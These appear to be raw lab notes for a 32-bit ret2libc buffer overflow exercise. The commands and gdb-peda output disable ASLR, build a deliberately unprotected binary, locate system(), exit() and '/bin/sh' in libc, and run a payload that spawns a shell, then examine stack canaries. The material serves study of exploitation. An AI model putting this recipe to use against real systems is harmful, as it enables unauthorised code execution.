sudo sysctl -w kernel.randomize_va_space=0

gcc -m32 -g vulnerable.c -o vulnerable -fno-stack-protector -mpreferred-stack-boundary=2 -w

cat /proc/sys/kernel/randomize_va_space
gdb vulnerable -q
=>
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

gdb vulnerable -q

checksec
b printf
r `python -c 'print("A"*8)'`
p system
p exit

info proc mappings
strings -a -t x /lib/i386-linux-gnu/libc-2.23.so | grep "/bin/sh"

find "/bin/sh"
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xf7f71b2b ("/bin/sh")     
the sum of 15bb2b and 0xf7e16000 is 0xf7f71b2b.
r `python -c 'print("A"*12+"\xb0\x0d\xe5\xf7"+"\xe0\x49\xe4\xf7"+"\x2b\x5b\xe1\xf7")'`

./vulnerable `python -c 'print("A"*12 +"\xb0\x0d\xe5\xf7"+"\xe0\x49\xe4\xf7"+"\x2b\x1b\xf7\xf7")'`

gcc vulnerable.c -mpreferred-stack-boundary=2 -o vulnerable
=> gdb vulnerable -q
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

gcc -o vulnerable vulnerable.c -fstack-protector-strong -D_FORTIFY_SOURCE=2 -pie -Wl,-z,relro,-z,now
=> gdb vulnerable -q
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : FULL


++++++++ CANARY
gcc vulnerable.c -mpreferred-stack-boundary=2 -o vulnerable
b printf
r `python -c 'print("A"*8)'`

info frame 
0xffffd708 -> 0x0
x/40xb 0xffffd708-8

gdb-peda$ x/40xb 0xffffd708-8
0xffffd700:     0x41    0x41    0x41    0x41    0x00    0x88    0x09    0xb8
0xffffd708:     0x00    0x00    0x00    0x00    0x47    0xe6    0xe2    0xf7
0xffffd710:     0x02    0x00    0x00    0x00    0xa4    0xd7    0xff    0xff
0xffffd718:     0xb0    0xd7    0xff    0xff    0x00    0x00    0x00    0x00
0xffffd720:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
r `python -c 'print("A"*12)'`
0xffffd6f8 -> 0x0

x/40xb 0xffffd6f8-12
gdb-peda$ x/40xb 0xffffd6f8-12
0xffffd6ec:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd6f4:     0x41    0x41    0x41    0x41    0x00    0x00    0x00    0x00
0xffffd6fc:     0x47    0xe6    0xe2    0xf7    0x02    0x00    0x00    0x00
0xffffd704:     0x94    0xd7    0xff    0xff    0xa0    0xd7    0xff    0xff
0xffffd70c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

=> 
0x00    0x88    0x09    0xb8

payload = A*12 + address of system() + return address for system() + address of "/bin/sh"

r `python -c 'print("A"*12+"\xb0\x0d\xe5\xf7"+"\xe0\x49\xe4\xf7"+"\x2b\x1b\xf7\xf7")'`

./vulnerable `python -c 'print("A"*12+"\xb0\x0d\xe5\xf7"+"\xe0\x49\xe4\xf7"+"\x2b\x1b\xf7\xf7")'`



Lab 1:
./vulnerable `python -c 'print("A"*12+"\xb0\x0d\xe5\xf7"+"\xe0\x49\xe4\xf7"+"\x2b\x1b\xf7\xf7")'`
r `python -c 'print("A"*12+"\xb0\x0d\xe5\xf7"+"\xe0\x49\xe4\xf7"+"\x2b\x1b\xf7\xf7")'`

./vulnerable `python -c 'print("A"*12+"\xb0\x0d\xe5\xf7"+"\xe0\x49\xe4\xf7"+"\x2b\x5b\xe1\xf7")'`


gdb-peda$ x/40xb 0xffffd708-8
0xffffd700:     0x41    0x41    0x41    0x41    0x00    0x78    0x03    0xe9
0xffffd708:     0x00    0x00    0x00    0x00    0x47    0xe6    0xe2    0xf7
0xffffd710:     0x02    0x00    0x00    0x00    0xa4    0xd7    0xff    0xff
0xffffd718:     0xb0    0xd7    0xff    0xff    0x00    0x00    0x00    0x00
0xffffd720:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

gdb-peda$ x/40xb 0xffffd708-8
0xffffd700:     0x41    0x41    0x41    0x41    0x00    0x08    0x08    0x05
0xffffd708:     0x00    0x00    0x00    0x00    0x47    0xe6    0xe2    0xf7
0xffffd710:     0x02    0x00    0x00    0x00    0xa4    0xd7    0xff    0xff
0xffffd718:     0xb0    0xd7    0xff    0xff    0x00    0x00    0x00    0x00
0xffffd720:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

gdb-peda$ x/40xb 0xffffd708-8
0xffffd700:     0x41    0x41    0x41    0x41    0x00    0x81    0x50    0x15
0xffffd708:     0x00    0x00    0x00    0x00    0x47    0xe6    0xe2    0xf7
0xffffd710:     0x02    0x00    0x00    0x00    0xa4    0xd7    0xff    0xff
0xffffd718:     0xb0    0xd7    0xff    0xff    0x00    0x00    0x00    0x00
0xffffd720:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00